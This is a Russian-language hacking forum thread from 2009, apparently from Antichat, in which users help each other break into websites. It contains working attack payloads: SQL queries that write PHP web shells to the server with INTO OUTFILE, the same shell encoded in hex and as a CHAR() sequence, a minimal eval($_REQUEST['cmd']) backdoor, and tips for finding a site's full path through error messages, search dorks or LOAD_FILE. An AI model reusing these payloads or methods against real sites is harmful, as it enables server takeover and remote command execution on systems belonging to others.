02.12.2009, 01:40
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от Seravin
Много инфы искал, так ничего не нашёл... Проблема заключается вот в чём: есть запрос в который записывается параметр id, например http://test.ru/a.php?id=1, я знаю, что это строка, когда я подставляю id=1', то получаю:
SELECT a,b,c FROM testtable WHERE id='1\''. И вот чего я не понимаю: как обойти добавление слэша???????????????????????????
Никак.
|
|
|
02.12.2009, 02:05
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
Сообщение от mailbrush
Никак.
спс
|
|
|
|
02.12.2009, 06:21
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
почему запрос
SELECT '<?php system($_GET["cmd"]);?>' FROM `news` into outfile '/www/shell.php'
файл создаёт,но он пустой.
P.S. разобрался,таблицу не надо указывать.
Извините за глупость,но скажите,во что можно перекодировать php-код, чтобы в таком кодированном виде его интерпретатор всё-равно схавал?
Последний раз редактировалось p.r0phe.t; 02.12.2009 в 07:23..
|
|
|
|
02.12.2009, 07:52
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от p.r0phe.t
почему запрос
SELECT '<?php system($_GET["cmd"]);?>' FROM `news` into outfile '/www/shell.php'
файл создаёт,но он пустой.
P.S. разобрался,таблицу не надо указывать.
Извините за глупость,но скажите,во что можно перекодировать php-код, чтобы в таком кодированном виде его интерпретатор всё-равно схавал?
в hex
SELECT 0x3C3F7068702073797374656D28245F4745545B22636D6422 5D293B3F3E FROM `news` into outfile '/www/shell.php'
или char
SELECT char(60,63,112,104,112,32,115,121,115,116,101,109, 40,36,95,71,69,84,91,34,99,109,100,34,93,41,59,63, 62) FROM `news` into outfile '/www/shell.php'
__________________
Появляюсь редко. Важные дела в реале.
|
|
|
|
02.12.2009, 08:11
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Сообщение от AFoST
в hex
SELECT 0x3C3F7068702073797374656D28245F4745545B22636D6422 5D293B3F3E FROM `news` into outfile '/www/shell.php'
или char
SELECT char(60,63,112,104,112,32,115,121,115,116,101,109, 40,36,95,71,69,84,91,34,99,109,100,34,93,41,59,63, 62) FROM `news` into outfile '/www/shell.php'
закодировал в хекс,при обращении тупо текст выдает.
|
|
|
|
02.12.2009, 11:01
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
С нами:
8943448
Репутация:
127
|
|
пытаюсь залить шелл на сайт, как мне узнать путь куда можно залить свой файл. На сайте можно читать файлы.
|
|
|
|
02.12.2009, 12:58
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Сообщение от Bramin
пытаюсь залить шелл на сайт, как мне узнать путь куда можно залить свой файл. На сайте можно читать файлы.
Найти бажный скрипт,который в тексте ошибки выдаст полный путь до директории сайта. Либо перебором через лоадфайл,что достаточно геморно.
|
|
|
|
02.12.2009, 13:23
|
|
Banned
Регистрация: 02.12.2008
Сообщений: 43
С нами:
9178715
Репутация:
4
|
|
Сообщение от p.r0phe.t
Найти бажный скрипт,который в тексте ошибки выдаст полный путь до директории сайта. Либо перебором через лоадфайл,что достаточно геморно.
часто выручает гугл
site:site.com "warn" итд , вобщем ищем ошибки 
|
|
|
|
02.12.2009, 13:01
|
|
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами:
8799871
Репутация:
19
|
|
Скажите,можно ли залить полноценный шелл,например r57 через инто аутфайл,предварительно закодировав скрипт в hex? пробовал; при обращении к скрипту мыдаются ошибки,хотя простейший шелл для ввода команд спокойно работает в тех же условиях. в чём загвоздка?
|
|
|
|
02.12.2009, 13:15
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
С нами:
9328706
Репутация:
1503
|
|
p.r0phe.t, не извращайся, залей <? eval($_REQUEST['cmd']); ?> а потмо уже лей как тебе нравится! =)
З.Ы. Дай угадаю, ты еще гетом передавал весь захексенный скрипт шелла? =)
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для x[0]x](/avatars/avatar69745.jpg?1729094){kind=avatar}
Похожие темы
Комбинированный вид
